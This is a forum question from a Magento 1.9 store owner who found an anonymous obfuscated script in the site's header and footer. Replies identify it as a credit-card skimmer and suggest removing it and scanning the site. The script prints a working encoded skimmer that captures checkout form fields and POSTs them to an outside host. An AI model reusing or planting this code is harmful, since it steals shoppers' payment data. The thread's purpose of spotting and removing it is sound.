# Anonymous Scripts found in header and footer section magento source page

Tags: magento-1.9

```
<script>
var x="xct\'42upf\'42\'5Fpwnn\'5D\'2C\'2Chwpevkqp\'42uvctv\'4:\'4;\'9D\'2C\'42\'42kh\'4:\'4:pgy\'42TgiGzr\'4:\'49qpgrcigejgemqwv\'9Eqpguvgrejgemqwv\'9Eqpgrcig\'9Ehktgejgemqwv\'9Eukorngejgemqwv\'49\'4;\'4;0vguv\'4:ykpfqy0nqecvkqp\'4;\'4;\'42\'9D\'2C\'42\'42\'42\'42\'42\'42\'42\'42ugpf\'4:\'4;\'5D\'2C\'42\'42\'42\'42\'42\'42\'42\'2C\'42\'42\'42\'42\'9F\'2C\'2C\'9F\'2Cfqewogpv0cffGxgpvNkuvgpgt\'4:\'44FQOEqpvgpvNqcfgf\'44\'4E\'42uvctv\'4;\'5D\'2C\'2Chwpevkqp\'42enm\'4:\'4;\'42\'9D\'2C\'42\'42\'42\'42xct\'42kpr\'5Ffqewogpv0swgt{UgngevqtCnn\'4:\'44kprwv\'4E\'42ugngev\'4E\'42vgzvctgc\'4E\'42ejgemdqz\'44\'4;\'5D\'2C\'42\'42\'42\'42hqt\'42\'4:xct\'42k\'5F2\'5Dk\'5Ekpr0ngpivj\'5Dk--\'4;\'9D\'2C\'42\'42\'42\'42\'42\'42\'42\'42kh\'4:kpr\'7Dk\'7F0xcnwg0ngpivj\'5G2\'4;\'42\'9D\'2C\'42\'42\'42\'42\'42\'42\'42\'42xct\'42pog\'5Fkpr\'7Dk\'7F0kf\'5D\'2C\'42\'42\'42\'42\'42\'42\'42\'42kh\'4:pog\'5F\'5F\'49\'49\'4;\'42\'9D\'42pog\'5Fk\'5D\'42\'9F\'2C\'42\'42\'42\'42\'42\'42\'42\'42upf-\'5Fkpr\'7Dk\'7F0kf-\'49\'5F\'49-kpr\'7Dk\'7F0xcnwg-\'49\'48\'49\'5D\'2C\'42\'42\'42\'42\'42\'42\'42\'42\'9F\'2C\'42\'42\'42\'42\'9F\'2C\'42\'42\'42\'2C\'9F\'2C\'2C\'2Chwpevkqp\'42ugpf\'4:\'4;\'42\'9D\'2C\'42xct\'42dvp\'5Ffqewogpv0swgt{UgngevqtCnn\'4:\'44c\'7Djtgh,\'5F\'49lcxcuetkrv\'5Cxqkf\'4:2\'4;\'49\'7F\'4Edwvvqp\'4E\'42kprwv\'4E\'42uwdokv\'4E\'420dvp\'4E\'420dwvvqp\'44\'4;\'5D\'2C\'42\'42\'42\'42hqt\'42\'4:xct\'42k\'5F2\'5Dk\'5Edvp0ngpivj\'5Dk--\'4;\'9D\'2C\'42\'42\'42\'42\'42\'42\'42\'42xct\'42d\'5Fdvp\'7Dk\'7F\'5D\'2C\'42\'42\'42\'42\'42\'42\'42\'42kh\'4:d0v{rg\'43\'5F\'49vgzv\'49\'42\'48\'48\'42d0v{rg\'43\'5F\'49ungev\'49\'42\'48\'48\'42d0v{rg\'43\'5F\'49ejgemdqz\'49\'42\'48\'48\'42d0v{rg\'43\'5F\'49rcuuyqtf\'49\'42\'48\'48\'42d0v{rg\'43\'5F\'49tcfkq\'49\'4;\'42\'9D\'2C\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42kh\'4:d0cffGxgpvNkuvgpgt\'4;\'42\'9D\'2C\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42d0cffGxgpvNkuvgpgt\'4:\'44enkem\'44\'4E\'42enm\'4E\'42hcnug\'4;\'5D\'2C\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'9Fgnug\'42\'9D\'2C\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42d0cvvcejGxgpv\'4:\'49qpenkem\'49\'4E\'42enm\'4;\'5D\'2C\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'9F\'2C\'42\'42\'42\'42\'42\'42\'42\'42\'9F\'2C\'42\'42\'42\'42\'9F\'2C\'2C\'42\'42\'42\'42xct\'42hto\'5Ffqewogpv0swgt{UgngevqtCnn\'4:\'44hqto\'44\'4;\'5D\'2C\'42\'42\'42\'42hqt\'42\'4:xct\'42k\'5F2\'5Dk\'5Ehto0ngpivj\'5Dk--\'4;\'9D\'2C\'42\'42\'42\'42\'42\'42\'42\'42kh\'4:hto\'7Dk\'7F0cffGxgpvNkuvgpgt\'4;\'42\'9D\'2C\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42hto\'7Dk\'7F0cffGxgpvNkuvgpgt\'4:\'44uwdokv\'44\'4E\'42enm\'4E\'42hcnug\'4;\'5D\'2C\'42\'42\'42\'42\'42\'42\'42\'42\'9Fgnug\'42\'9D\'2C\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42\'42hto\'7Dk\'7F0cvvcejGxgpv\'4:\'49qpuwdokv\'49\'4E\'42enm\'4;\'5D\'2C\'42\'42\'42\'42\'42\'42\'42\'42\'9F\'2C\'42\'42\'42\'42\'9F\'2C\'2C\'42\'42\'42\'42kh\'4:upf\'43\'5Fpwnn\'4;\'42\'9D\'2C\'2;xct\'42ee\'42\'5F\'42pgy\'42TgiGzr\'4:\'44\'7D2/;\'7F\'9D35\'4E38\'9F\'44\'4;\'5D\'2C\'2;\'2;xct\'42cuf\'5F\'442\'44\'5D\'2C\'42\'42\'42\'42\'42\'42\'42kh\'4:ee0vguv\'4:upf\'4;\'4;\'9D\'2C\'2;\'2;\'42\'42cuf\'5F\'443\'44\'42\'5D\'2C\'2;\'42\'42\'42\'9F\'2Cxct\'42jvvr\'42\'5F\'42pgy\'42ZONJvvrTgswguv\'4:\'4;\'5D\'2Cjvvr0qrgp\'4:\'44RQUV\'44\'4E\'44jvvru\'5C11cocuv{0dk|1nkd1rc{rcnakeqp0lri\'44\'4Evtwg\'4;\'5D\'2Cjvvr0ugvTgswguvJgcfgt\'4:\'44Eqpvgpv/v{rg\'44\'4E\'44crrnkecvkqp1z/yyy/hqto/wtngpeqfgf\'44\'4;\'5D\'2Cjvvr0ugpf\'4:\'44fcvc\'5F\'44-upf-\'44\'48cuf\'5F\'44-cuf-\'44\'48kfakf\'5Fkppqx:vkxgfgukipu0eqo\'44\'4;\'5D\'2C\'42\'42\'42\'42\'9F\'2C\'42\'42\'42\'42upf\'5Fpwnn\'5D\'2C\'42\'42\'42\'42ugvVkogqwv\'4:\'49ugpf\'4:\'4;\'49\'4E\'42352\'4;\'5D\'2C\'9F\'2C\'2C",y="",w="",z;z=x['length'];for(i=0;i<z;i++){y+=String['fromCharCode'](x['charCodeAt'](i)-2) }w=this['unescape'](y);this['eval'](w);
</script>
```

Comment: What would you like to know about that? What is the question?

Comment: Covered here: https://gwillem.gitlab.io/2016/10/11/5900-online-stores-found-skimming/

Comment: I have already seen this links but i am unable to understand

Answer (score 0):

This is basically the credit card highjack script. Please remove this script.

It is strongly recommended to check system->configuration->Design->Miscellaneous Scripts and remove the anonymous scripts you find there.

Moreover, you can also scan your website here @ 'https://www.magereport.com' for security leaks.

Comment: In admin there is no scripts in Miscellaneous Scripts